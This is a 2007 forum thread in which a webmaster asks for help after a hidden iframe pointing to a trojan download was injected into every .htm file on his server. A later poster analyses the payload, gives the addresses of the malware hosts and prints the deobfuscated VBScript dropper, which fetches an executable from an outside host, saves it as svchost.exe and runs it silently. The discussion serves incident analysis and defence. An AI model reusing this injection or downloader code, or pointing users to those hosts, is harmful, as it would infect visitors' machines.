|
Posted by s on September 6, 2007, 11:25 am
If you were Registered and logged in, you could reply and use other advanced thread options
Hi folks,
Hoping someone here might be able to give some advice on an infection.
Today at around 9:42am my local time one of my web servers got infected
somehow. What ever infected it then scanned through all .htm files on
the server and added the following line near the bottom of each one.
I've removed the domain name:-
<iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
height=0></iframe>
So, any time someone tried to view a site on my server they were also
directed to a Trojan download.
I have since removed these lines from all the .htm files but I have no
idea how someone managed to run a program on my server that inserted all
these lines.
Obviously I'm no expert on security etc but I have tried to make sure my
firewall is up to a reasonable standard and also have Norton AV
Corporate running on the server.
Any advice/help is much appreciated.
|
|
Posted by Gabriele Neukam on September 6, 2007, 11:42 am
If you were Registered and logged in, you could reply and use other advanced thread options
On this special day, s wrote:
> Today at around 9:42am my local time one of my web servers got infected
> somehow. What ever infected it then scanned through all .htm files on the
> server and added the following line near the bottom of each one.
>
> I've removed the domain name:-
> <iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
> height=0></iframe>
Maybe it is related to this incident
http://www.heise-security.co.uk/news/95591
Gabriele Neukam
Gabriele.Spamfighter.Neukam@t-online.de
--
> Is there such a thing as a Honeymoon period in a new newsgroup?
(Roger Hunt in uk.comp.vintage)
In a want it now instantly straight away world - no :-)
(Krustov in ucv)
|
|
Posted by s on September 6, 2007, 2:13 pm
If you were Registered and logged in, you could reply and use other advanced thread options
> On this special day, s wrote:
>
>> Today at around 9:42am my local time one of my web servers got
>> infected somehow. What ever infected it then scanned through all .htm
>> files on the server and added the following line near the bottom of
>> each one.
>>
>> I've removed the domain name:-
>> <iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
>> height=0></iframe>
>
> Maybe it is related to this incident
>
> http://www.heise-security.co.uk/news/95591
>
>
> Gabriele Neukam
>
> Gabriele.Spamfighter.Neukam@t-online.de
>
It could well be related, I really don't know.
What I don't understand is how hackers get the server to run something
that then scan's all the .htm files and injects the iframe line.
|
|
Posted by jen on September 6, 2007, 4:24 pm
If you were Registered and logged in, you could reply and use other advanced thread options > Gabriele Neukam wrote:
>> On this special day, s wrote:
>>> Today at around 9:42am my local time one of my web servers got
>>> infected somehow. What ever infected it then scanned through all
>>> .htm files on the server and added the following line near the
>>> bottom of each one.
>>> I've removed the domain name:-
>>> <iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
>>> height=0></iframe>
>> Maybe it is related to this incident
>> http://www.heise-security.co.uk/news/95591
> It could well be related, I really don't know.
> What I don't understand is how hackers get the server to run something
> that then scan's all the .htm files and injects the iframe line.
Maybe reading this will enlighten you some(Google is your friend):
Virus Attack on web server
Iframe code getting added to each page request:
http://www.webmasterworld.com/microsoft_asp_net/3279736.htm
large-scale web attacks targeting sites and their users:
http://arstechnica.com/news.ars/post/20070618-security-researchers-uncover-massive-attack-on-italian-web-sites.html
-jen
|
|
Posted by Virus Guy on September 6, 2007, 8:10 pm
If you were Registered and logged in, you could reply and use other advanced thread options
> (...) hker.htm
While searching the web for instances of kher.htm, I came across
these:
(warning - do not follow these links unless you know what you're
doing)
www.goldwindos2000.com/hkeraone/test.htm
us6.redhat520.com/haoba.htm
They are really executable files (not htm).
As of around 2 pm (EST), test.htm is identified mostly as a
downloader.trojan (4608.KF / 4608.102). Detection rate is 47% (not
detected by Kaspersky, Symantec among others).
haoba.htm is identified as Explorer.Hijack.AJYS / .4080. Detection
rate is 37%. Not detected by Avast, F-prot, Kaspersky, McAfee,
Microsoft, Symantec, among others.
---------------------------------
hker.htm is being coded with random spaces to give different MD5
hashes.
I submitted a sample to VT, and only 2 AV's id'd it as a threat:
Authentium: VBS/Psyme.BT@dl
NOD32v2: JS/Exploit.ADODB.Stream.Y
See this:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=VBS_PSYME.FP
When you take out the spaces, here's what it is (can someone decode
this script and print the URL?)
(I removed a few < and > because my nntp server doesn't like HTML code
I guess)
html
scriptlanguage="VBScript"
onerrorresumenext
dl="http://www.goldwindos2000.com/hkeraone/test.htm"
Setdf=document.createElement("object")
df.setAttribute"classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Setx=df.CreateObject(strb,"")
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
stra=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15
setS=df.createobject(stra,"")
S.type=1
c4="G"
c5="E"
c6="T"
strc=c4&c5&c6
x.Openstrc,dl,False
x.Send
fname1="svchost.exe"
setF=df.createobject("Scripting.FileSystemObject","")
settmp=F.GetSpecialFolder(2)
S.open
fname1=F.BuildPath(tmp,fname1)
S.writex.responseBody
S.savetofilefname1,2
S.close
setQ=df.createobject("Shell.Application","")
Q.ShellExecutefname1,"","","open",0
/script
head
title Hello!!! /title
/head body
/body /html
|
| Similar Threads | Posted | | Trojan Horse PSW.online infected | December 17, 2007, 2:22 am |
| Trend Micro site infected users with Trojan | March 15, 2008, 8:06 pm |
| "Reptile" server? | August 6, 2005, 2:43 am |
| ftp server found. | March 9, 2006, 4:19 pm |
| Unknown POP3 server | January 29, 2006, 6:21 pm |
| Can viruses be planted on a server? | July 18, 2006, 7:56 pm |
| problems with exchange server | December 19, 2006, 2:34 am |
| Steganos update server | December 29, 2007, 5:07 am |
| trojaned proxy server | June 17, 2008, 11:19 am |
| What Anti-Virus for Server? | October 31, 2008, 5:17 pm |
|
XML site map